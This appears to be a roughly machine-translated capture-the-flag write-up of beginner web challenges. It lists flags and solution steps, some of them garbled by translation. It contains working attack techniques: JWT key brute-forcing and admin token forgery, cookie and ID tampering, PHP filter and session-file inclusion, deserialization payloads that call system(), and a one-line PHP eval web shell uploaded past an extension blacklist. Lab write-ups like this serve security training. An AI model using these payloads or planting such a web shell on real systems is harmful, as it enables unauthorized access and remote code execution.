1. Honey Snow Ice City Ji police store
Clicked on the range, found that the question said that the hidden milk tea (that is, the ninth cup) will give a flag, but obviously only eight cups, guess the probability of the test is the front-end code change
Change id=1 to id=9, then go back to the page and click on Original Milk Tea to bring up the flag.
#flag{7d43cc8863ad0ee649048e562fde53ec}
2. Summon the Dragon
Opened the range and found it was a game, played a few games and found it difficult to pass the game.
F12 to see the source code of the interface, found a string of text in the file, guess it is jsfuck (from brainfuck)
Go to the tool, decrypt the flag
#flag{fdf9a88ec4fdd9e3dedaafeece5cc248}
flag
Opened the range and pressed F12, found that the flag is given, we use the tool dirsearch scanning, and found that there are files
Accessing it gives you the third flag3:c0ad71dadd11}
Then BurpSuite grabbed and sent packets to try to get something back, found that you can get the second flag2:3ca8737a70f029d
We notice that there is a Set-Cookie in the return packet, we try to change the id to 1 to send the packet, we get flag1:flag{7ac5b
Splice three flags to get the final result:flag{7ac5b3ca8737a70f029dc0ad71dadd11}
Opened the range, found a login and registration, guessing that the expedition vertically overstepped the authority, through the normal user to the admin user to lift authority
Log in with your registered username and press F12, since the title is jwt, we find the value of jwt, and then use the tool to blast it to get the key: SYSA
An explanation of JWT: JWT (json web token)
JWT (json web token), the token consists of three parts in a compact form, which are separated by dots (.) ).
Then decode the jwt values via the online site :/, (if it's an offline tournament, you can split it by . for offline tournaments, and decode each segment with base64).
Next, change the username to admin, add the key, and get the new jwt value: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.9avq5ApZ-XZul2kbon8z2cB6Y4bNru_. 0nnIZfJ1mO50
Change the jwt value of the page to the new jwt value, and then revisit the page.
This way we'll be able to overstep our authority, and we'll be able to get the flag by clicking on the personal center.
#flag{ec39c705cfb5295f9dddcedc819a1659}
5. Sign in
I opened the range, and I couldn't get the submit button to work.
Sure enough, open BurpSuite to capture packets, first by sending packets to see the return packet, found that you need to use POST request, and the value of the parameter for the key, the first attempt key=flag
Then follow the prompts and modify the parameter values to get the flag.
#flag{fa3f77dd58a0a8f990bb6292da75618f}
The file contains
Open the range, use BurpSuite to capture packets, found that the return packet has Set-Cookie parameters, and then according to the title of the description, guess there is a pseudo-protocol
Take the base64 ciphertext, put it on the cooker and decrypt it.
Here we guess the session file is in the /tmp directory, the file format is sess_+sessionid, this side of the sessionid in the return package there are
Read the flag via cat or tac.
#flag{43306e8113f53ece238c0a124432ce19}
't touch me
Open the range, press F12, find the tip.
Then go straight to the F12 method, and follow its instructions step by step.
Just visit
#flag{0cee5a97f12b172ceeea2e9f67b7413e}
very nice
This question looks at basic deserialization
<?php
class Example
{
public $sys="system('ls');";
}
$a = new Example();
echo serialize($a);
?>
#Show all files back first, O:7:"Example":1:{s:3:"sys";s:13:"system('ls');";}
find that there is, Because it will directly execute the, We useinclude+Pseudo-protocol to read
<?php
class Example
{
public $sys="include('php://filter/read=convert.base64-encode/resource=');";
}
$a = new Example();
echo serialize($a);
?>
#O:7:"Example":1:{s:3:"sys";s:69:"include('php://filter/read=convert.base64-encode/resource=');";}
base64 decryption is sufficient
#flag{202cb962ac59075b964b07152d234b70}
Refer to a handful of pokies online
<?php
class Example
{
public $sys="system('tac f*');";
}
$a = new Example();
echo serialize($a);
?>
#O:7:"Example":1:{s:3:"sys";s:17:"system('tac f*');";}
#flag{202cb962ac59075b964b07152d234b70}
deceptive
Catch the packet, change the value of the cookie to admin and you're good to go!
#flag{10e35c76602b330149ef009e0b484d8f}
Opened the range, found a * Horse to upload, found a code that should hide a blacklist.
A code audit revealed that it is possible to try to bypass this by double-writing the file extension
One sentence * Horse
<?php @eval($_POST['aaa']);? >
Then just connect through the Chinese Ant Sword
#flag{a89f40341f4271659154829a2215f428}